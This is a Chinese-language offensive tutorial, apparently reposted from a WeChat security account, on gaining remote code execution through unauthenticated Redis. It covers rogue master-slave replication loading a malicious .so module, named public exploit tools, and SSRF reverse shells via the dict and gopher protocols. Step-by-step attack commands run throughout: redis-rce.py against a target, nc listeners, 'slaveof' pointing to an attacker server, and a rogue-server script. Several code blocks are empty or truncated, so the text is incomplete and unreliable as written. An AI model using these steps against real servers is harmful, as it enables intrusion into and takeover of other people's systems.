Redis未授权漏洞常见的漏洞利用方式:
Windows下,绝对路径写webshell 、写入启动项。
Linux下,绝对路径写webshell 、公私钥认证获取root权限 、利用contrab计划任务反弹shell。
基于Redis主从复制的机制,可以完美无损的将文件同步到从节点。这就使得它可以轻易实现以上任何一种漏洞利用方式,而且存在着更多的可能性等待被探索。
一、Redis 主从复制一键自动化RCE
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。
通过脚本实现一键自动化getshell:
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
2、攻击端执行:python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so
git clone https://github.com/Ridter/redis-rce.git
二、Redis主从复制利用原理
首先,我们通过一个简单的测试,来熟悉一下slave和master的握手协议过程:
1、监听本地1234端口
nc -lvvp 1234
2、将Redis服务器设置为从节点(slave)
slaveof 127.0.0.1 1234
3、使用nc模拟Redis主服务器,进行模拟Redis主从交互过程(红色部分为slave发送的命令):
以上,通过nc进行模拟Redis主从复制的交互过程,同理,如果构建模拟一个Redis服务器,利用Redis主从复制的机制,那么就可以通过FULLRESYNC将任意文件同步到从节点。
三、Redis主从复制手动挡
手动操作过程记录:
1、编写脚本,构造恶意Redis服务器,监听本地端口1234,加载exp.so。
python RogueServer.py --lport 1234 --exp exp.so
2、通过未授权访问连入要攻击的redis服务器。
执行相关命令:
#设置redis的备份路径为当前目录
成功执行系统命令:
四、SSRF+Redis 反弹shell
参照Redis手动getshell的过程,可轻易实现SSRF+Redis反弹shell。
以curl为例,漏洞代码为ssrf.php:
<?php
环境准备:
模拟内网未授权Redis服务器:192.168.172.131
模拟攻击者机器:192.168.172.129,在攻击者机器上构建恶意Redis服务器,同时监听本地9999端口等待shell返回。
1、利用dict协议反弹shell
#查看当前redis的相关配置
2、利用gopher协议反弹shell
#设置文件名,连接恶意Redis服务器
3、利用这两种协议,都可以成功反弹shell。
附:简单改写的模拟Redis服务端脚本
import socket
本文分享自微信公众号 - Bypass(Bypass--)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。